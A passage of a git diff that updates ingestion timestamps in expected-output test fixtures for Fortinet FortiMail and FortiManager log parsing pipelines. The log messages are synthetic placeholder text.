"date=2019-5-13 time=21:45:57 device_id=imaven log_id=dmin log_part=sum type=event subtype=system pri=low user=lore ui=nim action=cancel status=edquiac msg=psamvolu", "event": { - "ingested": "2021-06-29T09:33:00.527140700Z" + "ingested": "2021-12-09T13:37:30.096475900Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "date=2019-5-28 time=04:48:31 device_id=iade log_id=tae log_part=obe type=event subtype=admin pri=medium user=ulapari ui=rittenby(10.31.31.193) action=deny status=nvol reason=unknown msg=\"luptatem\"", "event": { - "ingested": "2021-06-29T09:33:00.527144700Z" + "ingested": "2021-12-09T13:37:30.096482Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "date=2019-6-11 time=11:51:06 device_id=conse log_id=ruredolo log_part=ati type=event subtype=system pri=low user=olors ui=roid(10.234.156.8) action=block status=uteiru msg=\"xer\"", "event": { - "ingested": "2021-06-29T09:33:00.527148700Z" + "ingested": "2021-12-09T13:37:30.096488100Z" }, "tags": [ "preserve_original_event" @@ -1050,7 +1050,7 @@ }, "message": "date=2019-6-25 time=18:53:40 device_id=nvol log_id=uame log_part=quia type=event subtype=update pri=very-high msg=\"labor\"", "event": { - "ingested": "2021-06-29T09:33:00.527152200Z" + "ingested": "2021-12-09T13:37:30.096494200Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "date=2019-7-10 time=01:56:14 device_id=mwritte log_id=modit log_part=quamnih type=event subtype=config pri=medium user=itanimid ui=uiin module=nibusBo submodule=iusm msg=\"nostru\"", "event": { - "ingested": "2021-06-29T09:33:00.527157800Z" + "ingested": "2021-12-09T13:37:30.096500300Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "date=2019-7-24 time=08:58:48 device_id=vel log_id=preh log_part=madmini type=event subtype=update pri=high msg=edutpers", "event": { - "ingested": "2021-06-29T09:33:00.527163Z" + "ingested": "2021-12-09T13:37:30.096506400Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "date=2019-8-7 time=16:01:23 device_id=sBonoru log_id=everi log_part=squ type=virus subtype=file-signature pri=medium from=\"utla\" to=nse src=10.160.236.78 session_id=nostrude msg=\"Attachment file (rinc) has sha1 hash value: tno\"", "event": { - "ingested": "2021-06-29T09:33:00.527169500Z" + "ingested": "2021-12-09T13:37:30.096512600Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "date=2019-8-21 time=23:03:57 device_id=cid log_id=nonproi log_part=dolor type=event subtype=admin pri=medium user=molli ui=oeiusm(10.244.19.62) action=accept status=nnumquam reason=unknown msg=\"tdolore\"", "event": { - "ingested": "2021-06-29T09:33:00.527176700Z" + "ingested": "2021-12-09T13:37:30.096518700Z" }, "tags": [ "preserve_original_event" @@ -1110,7 +1110,7 @@ }, "message": "date=2019-9-5 time=06:06:31 device_id=icta log_id=epteu log_part=nvent type=event subtype=webmail pri=high user=mquiavol ui=odiconse(10.147.52.164) action=allow status=untutl msg=ugiatnul", "event": { - "ingested": "2021-06-29T09:33:00.527184Z" + "ingested": "2021-12-09T13:37:30.096524900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "date=2019-9-19 time=13:09:05 device_id=quaturve log_id=elaudant log_part=olup type=spam pri=high session_id=\"iacon\" client_name= \"ncu3839.www.localhost\" client_ip=\"10.201.105.58\" dst_ip=\"10.251.183.113\" from=\"ent\" to=\"ionemu\" subject=\"eseosqu\" msg=\"uptatem\"", "event": { - "ingested": "2021-06-29T09:33:00.527191200Z" + "ingested": "2021-12-09T13:37:30.096531Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "date=2019-10-3 time=20:11:40 device_id=eprehen log_id=oinB log_part=lor type=statistics pri=low session_id=\"citatio\" client_name=\"[10.209.203.156]\"dst_ip=\"10.132.139.98\" from=\"pariat\" to=\"borisnis\" direction=\"unknown\" virus=\"oremagn\" disposition=\"emagna\" classifier=\"uidolor\" message_length=remag", "event": { - "ingested": "2021-06-29T09:33:00.527198400Z" + "ingested": "2021-12-09T13:37:30.096535600Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "date=2019-10-18 time=03:14:14 device_id=tiumtot log_id=ulamcola log_part=epr type=event subtype=admin pri=low user=nculpa ui=enbyCice(10.152.196.145) action=block status=uptas reason=success msg=\"iadeseru\"", "event": { - "ingested": "2021-06-29T09:33:00.527205500Z" + "ingested": "2021-12-09T13:37:30.096540500Z" }, "tags": [ "preserve_original_event" @@ -1158,7 +1158,7 @@ }, "message": "date=2019-11-1 time=10:16:48 device_id=equ log_id=turadip log_part=ataev type=virus_file-signature pri=medium from=\"oree\" to=\"nimadmi\" src=\"utaliq [10.78.38.143]\" session_id=qui msg=\"Attachment file (epteurs) has sha1 hash value: did\"", "event": { - "ingested": "2021-06-29T09:33:00.527212800Z" + "ingested": "2021-12-09T13:37:30.096546200Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "date=2019-11-15 time=17:19:22 device_id=sunt log_id=orumSe log_part=olupta type=event subtype=update pri=very-high msg=pta", "event": { - "ingested": "2021-06-29T09:33:00.527220Z" + "ingested": "2021-12-09T13:37:30.096551500Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "date=2019-11-30 time=00:21:57 device_id=ntutlabo log_id=leumiure log_part=tasnu type=event subtype=smtp pri=high user=amquaui=tionevol(10.209.124.81) action=allowstatus=tobesession_id=\"ssequa\" log_part=emp msg=\"to=\u003c\u003cemoeni, delay=officiad, xdelay=veniam, mailer=igmp, pri=entoreve, relay=ion3339.www.localdomain\"", "event": { - "ingested": "2021-06-29T09:33:00.527227400Z" + "ingested": "2021-12-09T13:37:30.096555800Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "date=2019-12-14 time=07:24:31 device_id=int log_id=oremagn log_part=rnatur type=virus pri=medium from=uptatev to=\"oditem\" src=\"10.176.31.145\" session_id=\"ineavo\" msg=reseo", "event": { - "ingested": "2021-06-29T09:33:00.527234500Z" + "ingested": "2021-12-09T13:37:30.096560800Z" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json index a132bdf67af..a326353e5c5 100644 --- a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "logver=iusm devname=\"modtempo\" devid=\"olab\" vd=nto date=2016-1-29 time=6:09:59 logid=sse type=exercita subtype=der level=very-high eventtime=odoco logtime=ria srcip=10.20.234.169 srcport=1001 srcintf=eth5722 srcintfrole=vol dstip=10.44.173.44 dstport=6125 dstintf=enp0s3068 dstintfrole=nseq poluuid=itinvol sessionid=psa proto=21 action=allow policyid=ntium policytype=psaq crscore=13.800000 craction=eab crlevel=aliqu appcat=Ute service=lupt srccountry=dolore dstcountry=sequa trandisp=abo tranip=10.189.58.145 tranport=5273 duration=14.119000 sentbyte=7880 rcvdbyte=449 sentpkt=mqui app=nci", "event": { - "ingested": "2021-06-29T09:33:01.618087300Z" + "ingested": "2021-12-09T13:37:31.906792100Z" }, "tags": [ "preserve_original_event" @@ -18,7 +18,7 @@ }, "message": "date=2016-2-12 time=1:12:33 logver=litesse devid=orev devname=pisciv logid=uii type=umexe subtype=estlabo level=high vd=iatnu srcip=10.182.84.248 srcport=4880 srcintf=enp0s208 dstip=10.162.33.193 dstport=7200 dstintf=enp0s2581 poluuid=nulapari sessionid=mwritten proto=prm action=accept policyid=uidolor trandisp=nibus duration=72.226000 sentbyte=6378 rcvdbyte=3879 devtype=riosam osname=anonnu osversion=1.410 mastersrcmac=ameaqu srcmac=01:00:5e:84:66:6c crscore=145.047000 craction=squame crlevel=ntex eventtype=eius user=luptat service=emape hostname=aer445.host profile=eumiu reqtype=uame url=https://www.example.net/orisn/cca.htm?ofdeF=metcons#roinBCS direction=external msg=com method=eataevi cat=byC catdesc=tinculp device_id=tur log_id=atio pri=high userfrom=atemsequ adminprof=nci timezone=CEST main_type=eFini trigger_policy=amco sub_type=exe severity_level=iatu policy=ionofde src=10.62.4.246 src_port=189 dst=10.171.204.166 dst_port=6668 http_method=mol http_url=taspe http_host=mvolu http_agent=radip http_session_id=tNequ signature_subclass=gelit signature_id=6728 srccountry=tconsec content_switch_name=nsequat server_pool_name=taev false_positive_mitigation=roidents user_name=oluptas monitor_status=llu http_refer=https://api.example.org/tamremap/tur.html?radipis=isetq#estqui http_version=uasiarch dev_id=emaper threat_weight=ssitasp history_threat_weight=eum threat_level=sum ftp_mode=uaerat ftp_cmd=boreet cipher_suite=onev msg_id=tenima", "event": { - "ingested": "2021-06-29T09:33:01.618133600Z" + "ingested": "2021-12-09T13:37:31.906800400Z" }, "tags": [ "preserve_original_event" @@ -30,7 +30,7 @@ }, "message": "logver=seq dtime=2016-02-26 20:15:08.252538723 +0000 UTC devid=olorema devname=ccaecat vd=veleumi date=2016-2-26 time=8:15:08 logid=tia type=enim subtype=dqu level=medium eventtime=uian logtime=tempo srcip=10.200.188.142 srcport=4665 srcintf=eth4496 srcintfrole=eetd dstip=10.94.103.117 dstport=513 dstintf=enp0s3491 dstintfrole=doloreeu poluuid=pori sessionid=occ proto=icmp action=allow policyid=reetdolo policytype=nrepreh crscore=18.839000 craction=uiano crlevel=mrema appcat=autfu service=natura srccountry=aboris dstcountry=ima trandisp=tanimi tranip=10.15.159.80 tranport=6378 duration=121.916000 sentbyte=6517 rcvdbyte=13 sentpkt=ugiatqu app=eacomm", "event": { - "ingested": "2021-06-29T09:33:01.618141700Z" + "ingested": "2021-12-09T13:37:31.906804Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "logver=liqu devname=\"lorem\" devid=\"emq\" vd=isiu date=2016-3-12 time=3:17:42 logid=nimadmi type=iatisu subtype=iat level=low eventtime=suntinc logtime=elits srcip=10.131.233.27 srcport=5037 srcintf=eth3676 srcintfrole=eataevit dstip=10.50.112.141 dstport=7303 dstintf=eth3391 dstintfrole=olab poluuid=mquisnos sessionid=loremagn proto=1 action=cancel policyid=tsed policytype=orai crscore=61.614000 craction=incididu crlevel=eci appcat=aali service=ametcons srccountry=porainc dstcountry=amquisno trandisp=iinea tranip=10.27.88.95 tranport=776 duration=5.911000 sentbyte=1147 rcvdbyte=3269 sentpkt=tvol app=moll", "event": { - "ingested": "2021-06-29T09:33:01.618145100Z" + "ingested": "2021-12-09T13:37:31.906808800Z" }, "tags": [ "preserve_original_event" @@ -54,7 +54,7 @@ }, "message": "date=2016-3-26 time=10:20:16 logver=inim devid=ema devname=roinBCSe logid=onse type=tae subtype=tatno level=very-high vd=oluptate srcip=10.52.54.178 srcport=4427 srcintf=lo1567 dstip=10.37.58.155 dstport=2430 dstintf=eth6096 poluuid=ciati sessionid=ercit proto=3 action=allow policyid=eniam trandisp=reetdolo duration=165.411000 sentbyte=7651 rcvdbyte=3982 devtype=rumet osname=oll osversion=1.5670 mastersrcmac=nido srcmac=01:00:5e:c3:0a:41 crscore=71.955000 craction=itlabori crlevel=Ciceroi eventtype=aveniam user=uradi service=nimadmin hostname=olo7148.mail.home profile=snulapar reqtype=aedic url=https://api.example.com/iumto/aboreetd.gif?dun=enim#saute direction=internal msg=eriame method=lorema cat=avol catdesc=labor device_id=atuse log_id=ddoeiu pri=high userfrom=idolore adminprof=onse timezone=PST main_type=tation trigger_policy=ips sub_type=emeumfug severity_level=upta policy=omn src=10.87.212.179 src_port=1758 dst=10.157.213.15 dst_port=3539 http_method=ali http_url=nsect http_host=ntutl http_agent=caecatc http_session_id=onsequat signature_subclass=siuta signature_id=2896 srccountry=loru content_switch_name=ema server_pool_name=par false_positive_mitigation=itaut user_name=rveli monitor_status=rsint http_refer=https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf http_version=antiumto dev_id=strude threat_weight=ctetura history_threat_weight=usmod threat_level=edqui ftp_mode=mquidol ftp_cmd=ita cipher_suite=ipi msg_id=rsitamet", "event": { - "ingested": "2021-06-29T09:33:01.618152100Z" + "ingested": "2021-12-09T13:37:31.906814500Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "date=2016-4-9 time=5:22:51 logver=eseru devid=remeum devname=orain logid=quip type=oin subtype=uisquam level=high vd=tinvol srcip=10.19.68.92 srcport=1409 srcintf=enp0s33 dstip=10.38.22.45 dstport=7036 dstintf=lo1120 poluuid=ditautfu sessionid=piscing proto=icmp action=accept policyid=ostr trandisp=rudexerc duration=135.013000 sentbyte=3369 rcvdbyte=927 devtype=itaut osname=imaven osversion=1.152 mastersrcmac=umdolo srcmac=01:00:5e:f7:4a:fd crscore=169.252000 craction=tfug crlevel=icab eventtype=mwr user=fugi service=inculpaq hostname=agna7678.internal.host profile=equa reqtype=mexercit url=https://www.example.net/tasuntex/sunt.txt?ume=incidi#picia direction=unknown msg=olupt method=dit cat=sumquiad catdesc=dexeaco device_id=ivelits log_id=moenimi pri=medium userfrom=etdolo adminprof=inv timezone=CEST main_type=ommod trigger_policy=sequatur sub_type=uidolo severity_level=lumquido policy=nihi src=10.114.150.67 src_port=1407 dst=10.76.73.140 dst_port=3075 http_method=uines http_url=nsec http_host=onse http_agent=emips http_session_id=imadmi signature_subclass=ostrume signature_id=6051 srccountry=eataev content_switch_name=liquide server_pool_name=uasia false_positive_mitigation=emp user_name=aperia monitor_status=ofdeFini http_refer=https://example.org/vol/riat.htm?atvol=umiur#imad http_version=msequi dev_id=isnostru threat_weight=iquaUten history_threat_weight=santium threat_level=iciatisu ftp_mode=rehender ftp_cmd=eporroqu cipher_suite=uat msg_id=tem", "event": { - "ingested": "2021-06-29T09:33:01.618157300Z" + "ingested": "2021-12-09T13:37:31.906819100Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "logver=suntinc date=2016-4-24 time=12:25:25 log_id=xeac devid=nidolo devname=tatn logid=eli type=nnu subtype=dolo level=low vd=nse srcip=10.202.204.239 srcport=7783 srcintf=lo2857 dstip=10.147.28.176 dstport=7432 dstintf=enp0s1462 poluuid=mporain sessionid=icons proto=0 action=accept policyid=sequi trandisp=rehend duration=3.138000 sentbyte=6354 rcvdbyte=3605 devtype=numqu osname=qui osversion=1.4059 mastersrcmac=equi srcmac=01:00:5e:68:86:a1 crscore=72.701000 craction=tat crlevel=ipitla eventtype=quae user=maccusa service=uptat hostname=equep5085.mail.domain profile=aqu reqtype=rpo url=https://www.example.org/inesci/serror.html?mqu=apariat#tlabore direction=internal msg=ihilm method=atDu cat=eav catdesc=ionevo device_id=remagn log_id=run pri=very-high userfrom=iamquis adminprof=quirat timezone=CET main_type=ittenbyC trigger_policy=isc sub_type=aturve severity_level=emulla policy=mpori src=10.195.36.51 src_port=3905 dst=10.95.64.124 dst_port=7042 http_method=iadese http_url=nsectet http_host=utla http_agent=utei http_session_id=laborum signature_subclass=tionof signature_id=7613 srccountry=oin content_switch_name=lapari server_pool_name=data false_positive_mitigation=dolor user_name=nnum monitor_status=eritqu http_refer=https://internal.example.net/wri/bor.jpg?hitect=dol#leumiu http_version=namali dev_id=taevit threat_weight=rinrepre history_threat_weight=etconse threat_level=tincu ftp_mode=ari ftp_cmd=exercit cipher_suite=sci msg_id=quamnih", "event": { - "ingested": "2021-06-29T09:33:01.618179900Z" + "ingested": "2021-12-09T13:37:31.906823100Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "logver=occae dtime=2016-05-08 07:27:59.552538723 +0000 UTC devid=ctetura devname=labore vd=texp date=2016-5-8 time=7:27:59 logid=tMalor type=acc subtype=amc level=very-high eventtime=amest logtime=corp srcip=10.176.216.90 srcport=2428 srcintf=eth2591 srcintfrole=dantiumt dstip=10.186.85.3 dstport=5366 dstintf=lo821 dstintfrole=ento poluuid=pic sessionid=evita proto=prm action=allow policyid=duntut policytype=magni crscore=102.339000 craction=uptat crlevel=uam appcat=boris service=nti srccountry=abi dstcountry=sectetur trandisp=uioffi tranip=10.114.16.155 tranport=1608 duration=62.941000 sentbyte=5110 rcvdbyte=3818 sentpkt=ipi app=reseos", "event": { - "ingested": "2021-06-29T09:33:01.618187500Z" + "ingested": "2021-12-09T13:37:31.906828Z" }, "tags": [ "preserve_original_event" @@ -102,7 +102,7 @@ }, "message": "logver=mcolab date=2016-5-22 time=2:30:33 log_id=neav devid=oquisqu devname=sperna logid=eabilloi type=estia subtype=tper level=very-high vd=volupt srcip=10.188.169.107 srcport=2138 srcintf=eth6448 dstip=10.214.7.83 dstport=1696 dstintf=lo1616 poluuid=tenatu sessionid=uun proto=HOPOPT action=cancel policyid=ectio trandisp=dutper duration=4.781000 sentbyte=3423 rcvdbyte=3252 devtype=radi osname=gel osversion=1.3917 mastersrcmac=iduntu srcmac=01:00:5e:21:f5:0a crscore=57.435000 craction=uamqu crlevel=lor eventtype=oide user=dolore service=amvolu hostname=eturadi6608.mail.host profile=aera reqtype=ate url=https://api.example.com/nimid/itatione.htm?umwr=oluptate#issus direction=inbound msg=uaUteni method=udantium cat=pre catdesc=xeacom device_id=stlabo log_id=dictasu pri=low userfrom=catc adminprof=nsect timezone=GMT-07:00 main_type=asia trigger_policy=econs sub_type=uir severity_level=dol policy=essecil src=10.23.62.94 src_port=4368 dst=10.61.163.4 dst_port=1232 http_method=luptatem http_url=atem http_host=gnido http_agent=ratvolu http_session_id=olup signature_subclass=numqua signature_id=1411 srccountry=inculpa content_switch_name=abo server_pool_name=veniamqu false_positive_mitigation=nse user_name=non monitor_status=paquioff http_refer=https://www5.example.org/maven/hende.jpg?labor=didunt#uptatema http_version=intocc dev_id=liqu threat_weight=eporr history_threat_weight=xeacomm threat_level=mveleu ftp_mode=nofdeFin ftp_cmd=sequam cipher_suite=temvel msg_id=ris", "event": { - "ingested": "2021-06-29T09:33:01.618195Z" + "ingested": "2021-12-09T13:37:31.906833700Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "date=2016-6-5 time=9:33:08 logver=nisiuta devid=tvolu devname=ecte logid=tinvolu type=iurer subtype=iciadese level=medium vd=gnaaliq srcip=10.52.135.156 srcport=2660 srcintf=eth4502 dstip=10.133.89.11 dstport=1098 dstintf=lo4901 poluuid=sintoc sessionid=volupt proto=1 action=deny policyid=uiinea trandisp=Utenima duration=111.502000 sentbyte=1871 rcvdbyte=5074 devtype=ptatem osname=Nequepor osversion=1.2580 mastersrcmac=ugiatnu srcmac=01:00:5e:4a:7f:b8 crscore=103.738000 craction=mnisi crlevel=scivelit eventtype=tDuisaut user=oinBC service=quameius hostname=ipsumdol4488.api.localdomain profile=ommodico reqtype=ptas url=https://example.com/tetu/stru.htm?tlabore=Exc#pora direction=unknown msg=uteirure method=nevo cat=ide catdesc=aali device_id=adip log_id=tium pri=very-high userfrom=iusmodi adminprof=uamest timezone=PST main_type=uiac trigger_policy=epte sub_type=idolo severity_level=quinesc policy=madmi src=10.28.76.42 src_port=3427 dst=10.106.31.86 dst_port=4198 http_method=sno http_url=atno http_host=tani http_agent=volu http_session_id=nonn signature_subclass=inventor signature_id=6088 srccountry=autf content_switch_name=quamni server_pool_name=iatisu false_positive_mitigation=sec user_name=cons monitor_status=sBon http_refer=https://www.example.com/tae/ccaec.htm?aperiame=isc#ullamcor http_version=tobea dev_id=tor threat_weight=qui history_threat_weight=ntmollit threat_level=tenatus ftp_mode=cipitlab ftp_cmd=ipsumd cipher_suite=antiu msg_id=uirati", "event": { - "ingested": "2021-06-29T09:33:01.618199Z" + "ingested": "2021-12-09T13:37:31.906837800Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "logver=ersp dtime=2016-06-20 04:35:42.332538723 +0000 UTC devid=tquov devname=diconseq vd=inven date=2016-6-20 time=4:35:42 logid=osquira type=tes subtype=mquame level=medium eventtime=tnulapa logtime=orain srcip=10.238.164.74 srcport=2201 srcintf=lo4249 srcintfrole=madmi dstip=10.106.162.153 dstport=341 dstintf=lo7114 dstintfrole=amvo poluuid=qui sessionid=tasn proto=1 action=accept policyid=squirati policytype=Sedutp crscore=92.058000 craction=nbyCic crlevel=utlabor appcat=itessequ service=porro srccountry=ine dstcountry=lup trandisp=tatemUt tranip=10.58.214.16 tranport=508 duration=166.566000 sentbyte=2715 rcvdbyte=7130 sentpkt=pici app=abor", "event": { - "ingested": "2021-06-29T09:33:01.618202700Z" + "ingested": "2021-12-09T13:37:31.906842Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "logver=tquiin dtime=2016-07-04 11:38:16.592538723 +0000 UTC devid=tse devname=tenimad vd=minimav date=2016-7-4 time=11:38:16 logid=udexerci type=naal subtype=lore level=high eventtime=idolore logtime=pid srcip=10.225.141.20 srcport=2282 srcintf=enp0s4046 srcintfrole=natuse dstip=10.217.150.196 dstport=4639 dstintf=lo2438 dstintfrole=archite poluuid=loreme sessionid=untu proto=6 action=cancel policyid=datatno policytype=siutali crscore=49.988000 craction=usmodte crlevel=msequi appcat=tau service=exercita srccountry=ris dstcountry=eumiu trandisp=orumSe tranip=10.110.31.190 tranport=945 duration=12.946000 sentbyte=248 rcvdbyte=5300 sentpkt=eeufugia app=evit", "event": { - "ingested": "2021-06-29T09:33:01.618206700Z" + "ingested": "2021-12-09T13:37:31.906874Z" }, "tags": [ "preserve_original_event" @@ -150,7 +150,7 @@ }, "message": "date=2016-7-18 time=6:40:50 devname=molli device_id=velitse log_id=oditem type=generic subtype=gitsedqu pri=very-high devid=oremi devname=mestq logid=temUt type=olor subtype=ineavo level=very-high vd=mquelau srcip=10.168.236.85 srcport=6846 srcintf=eth651 dstip=10.140.113.244 dstport=4374 dstintf=lo4367 poluuid=fugitsed sessionid=quam proto=tcp action=deny policyid=fugiat trandisp=atisun duration=101.653000 sentbyte=3962 rcvdbyte=7741 devtype=dmin osname=fugi osversion=1.3319 mastersrcmac=inci srcmac=01:00:5e:e6:ad:ae crscore=39.291000 craction=avol crlevel=icero eventtype=xer user=emipsumd service=isisten hostname=cusant4946.www.domain profile=itecto reqtype=reetdol url=https://api.example.com/isnostr/umqu.htm?emquia=inesci#isnisi direction=unknown msg=aquioffi method=tamet cat=quatur catdesc=uisa device_id=eFi log_id=mexe pri=high userfrom=rpori adminprof=ice timezone=GMT+02:00 main_type=entorev trigger_policy=commodo sub_type=conseq severity_level=ame policy=tatn src=10.137.56.173 src_port=3932 dst=10.69.103.176 dst_port=1229 http_method=umdolo http_url=uptate http_host=amc http_agent=cusant http_session_id=orumSe signature_subclass=ratv signature_id=5227 srccountry=dutp content_switch_name=psaquaea server_pool_name=taevita false_positive_mitigation=ameiusm user_name=proide monitor_status=ano http_refer=https://www5.example.org/tvol/velitess.htm?edqui=nre#veli http_version=volupta dev_id=rnatu threat_weight=elitse history_threat_weight=ima threat_level=quasia ftp_mode=adi ftp_cmd=umwrit cipher_suite=uptate msg_id=mac", "event": { - "ingested": "2021-06-29T09:33:01.618210100Z" + "ingested": "2021-12-09T13:37:31.906881300Z" }, "tags": [ "preserve_original_event" @@ -162,7 +162,7 @@ }, "message": "logver=dolore devname=\"onsecte\" devid=\"nBCSedut\" vd=ugiat date=2016-8-2 time=1:43:25 logid=onulam type=ate subtype=odoconse level=high eventtime=quatu logtime=veli srcip=10.30.47.165 srcport=631 srcintf=eth267 srcintfrole=sectet dstip=10.5.235.217 dstport=3689 dstintf=lo5047 dstintfrole=pitl poluuid=por sessionid=quidexea proto=tcp action=deny policyid=runtmol policytype=texpli crscore=57.772000 craction=ptass crlevel=rita appcat=esseci service=tametcon srccountry=liqua dstcountry=mvele trandisp=isis tranip=10.25.212.118 tranport=1190 duration=179.686000 sentbyte=238 rcvdbyte=7122 sentpkt=dantium app=lor", "event": { - "ingested": "2021-06-29T09:33:01.618213800Z" + "ingested": "2021-12-09T13:37:31.906888500Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "date=2016-8-16 time=8:45:59 logver=onemulla devid=dolorem devname=tvolu logid=nreprehe type=tetu subtype=mdol level=high vd=nby srcip=10.20.26.210 srcport=2791 srcintf=eth5968 dstip=10.85.96.153 dstport=5286 dstintf=eth4392 poluuid=nsequat sessionid=doloreme proto=0 action=deny policyid=reprehe trandisp=tincu duration=93.111000 sentbyte=2826 rcvdbyte=6247 devtype=lor osname=oraincid osversion=1.225 mastersrcmac=emeumfug srcmac=01:00:5e:1d:39:39 crscore=114.626000 craction=liqua crlevel=olo eventtype=psumqu user=untincul service=iduntu hostname=ccaeca5504.internal.example profile=reseo reqtype=oreetd url=https://example.org/tiaec/rumwrit.txt?oconsequ=edquiac#urerepr direction=external msg=ercit method=etMal cat=qua catdesc=rsita device_id=ate log_id=ipsamvo pri=low userfrom=adeseru adminprof=tdol timezone=CET main_type=rem trigger_policy=asper sub_type=idunt severity_level=luptat policy=eveli src=10.149.13.76 src_port=7809 dst=10.40.152.253 dst_port=1478 http_method=ritt http_url=iaeco http_host=equaturv http_agent=siu http_session_id=snost signature_subclass=tpersp signature_id=2624 srccountry=quaea content_switch_name=ametcons server_pool_name=utali false_positive_mitigation=porinc user_name=tetur monitor_status=xce http_refer=https://example.com/aincidu/nimadmin.jpg?itinv=eumfugi#etdolor http_version=lupta dev_id=xeaco threat_weight=nvolupt history_threat_weight=oremi threat_level=elites ftp_mode=nbyCi ftp_cmd=tevel cipher_suite=usc msg_id=rem", "event": { - "ingested": "2021-06-29T09:33:01.618218100Z" + "ingested": "2021-12-09T13:37:31.906893800Z" }, "tags": [ "preserve_original_event" @@ -186,7 +186,7 @@ }, "message": "logver=cab dtime=2016-08-30 15:48:33.632538723 +0000 UTC devid=atisund devname=xea vd=ites date=2016-8-30 time=3:48:33 logid=isetq type=iutali subtype=velite level=high eventtime=avolupt logtime=ariatur srcip=10.98.194.212 srcport=5469 srcintf=lo1208 srcintfrole=atisetqu dstip=10.51.213.42 dstport=988 dstintf=enp0s3449 dstintfrole=ilmol poluuid=eri sessionid=quunt proto=HOPOPT action=deny policyid=mquae policytype=eriti crscore=96.729000 craction=cidunt crlevel=plica appcat=ore service=quidolor srccountry=inven dstcountry=eufugi trandisp=accusant tranip=10.233.120.207 tranport=136 duration=171.844000 sentbyte=2859 rcvdbyte=4844 sentpkt=eaqu app=nvol", "event": { - "ingested": "2021-06-29T09:33:01.618222900Z" + "ingested": "2021-12-09T13:37:31.906899600Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "logver=leumiu devname=\"tla\" devid=\"item\" vd=nimid date=2016-9-13 time=10:51:07 logid=dat type=periam subtype=dqu level=high eventtime=dminima logtime=dutpers srcip=10.245.187.229 srcport=4953 srcintf=lo3642 srcintfrole=prehen dstip=10.67.132.242 dstport=2340 dstintf=enp0s2700 dstintfrole=sequa poluuid=iosamnis sessionid=volupt proto=6 action=allow policyid=idid policytype=tesse crscore=64.509000 craction=boru crlevel=ptateve appcat=enderi service=ptatem srccountry=ptatevel dstcountry=tenatuse trandisp=psaqua tranip=10.241.132.176 tranport=7224 duration=167.705000 sentbyte=6595 rcvdbyte=7301 sentpkt=tame app=atione", "event": { - "ingested": "2021-06-29T09:33:01.618226600Z" + "ingested": "2021-12-09T13:37:31.906905600Z" }, "tags": [ "preserve_original_event" @@ -210,7 +210,7 @@ }, "message": "date=2016-9-28 time=5:53:42 logver=vitaedic devid=orin devname=uii logid=estl type=sitam subtype=orem level=very-high vd=uuntur srcip=10.210.28.247 srcport=3449 srcintf=eth4185 dstip=10.237.180.17 dstport=3023 dstintf=lo7672 poluuid=tate sessionid=onevo proto=6 action=allow policyid=aeconseq trandisp=lor duration=96.560000 sentbyte=2760 rcvdbyte=1775 devtype=emqu osname=riss osversion=1.1847 mastersrcmac=sitvol srcmac=01:00:5e:a5:5a:54 crscore=129.120000 craction=olorsi crlevel=aliq eventtype=mes user=mven service=olorsit hostname=tore7088.www.invalid profile=ruredo reqtype=mac url=https://mail.example.org/ptassita/its.gif?risnis=uov#itlab direction=outbound msg=sBono method=loremqu cat=tetur catdesc=amvo device_id=siuta log_id=urmagn pri=low userfrom=uptat adminprof=idex timezone=GMT+02:00 main_type=tatione trigger_policy=nimveni sub_type=idi severity_level=ore policy=quid src=10.212.214.4 src_port=6040 dst=10.199.47.220 dst_port=4084 http_method=oin http_url=hil http_host=cingel http_agent=modocon http_session_id=ipsu signature_subclass=ntNeq signature_id=1081 srccountry=aUt content_switch_name=boNem server_pool_name=nturm false_positive_mitigation=emips user_name=atv monitor_status=onu http_refer=https://www5.example.net/alorum/obeataev.gif?atDu=nsec#quidolor http_version=oqu dev_id=naaliq threat_weight=remeu history_threat_weight=osquir threat_level=mod ftp_mode=col ftp_cmd=mve cipher_suite=liquide msg_id=odt", "event": { - "ingested": "2021-06-29T09:33:01.618230400Z" + "ingested": "2021-12-09T13:37:31.906911400Z" }, "tags": [ "preserve_original_event" @@ -222,7 +222,7 @@ }, "message": "date=2016-10-12 time=12:56:16 logver=inv devid=rroq devname=rcit logid=aecatcup type=olabor subtype=estl level=very-high vd=citatio srcip=10.168.40.197 srcport=7699 srcintf=enp0s3071 dstip=10.206.69.135 dstport=6396 dstintf=eth3862 poluuid=utfug sessionid=aturQu proto=udp action=deny policyid=mipsamvo trandisp=eiusmod duration=91.147000 sentbyte=6153 rcvdbyte=4059 devtype=oreveri osname=ehende osversion=1.760 mastersrcmac=Except srcmac=01:00:5e:bf:07:ee crscore=45.760000 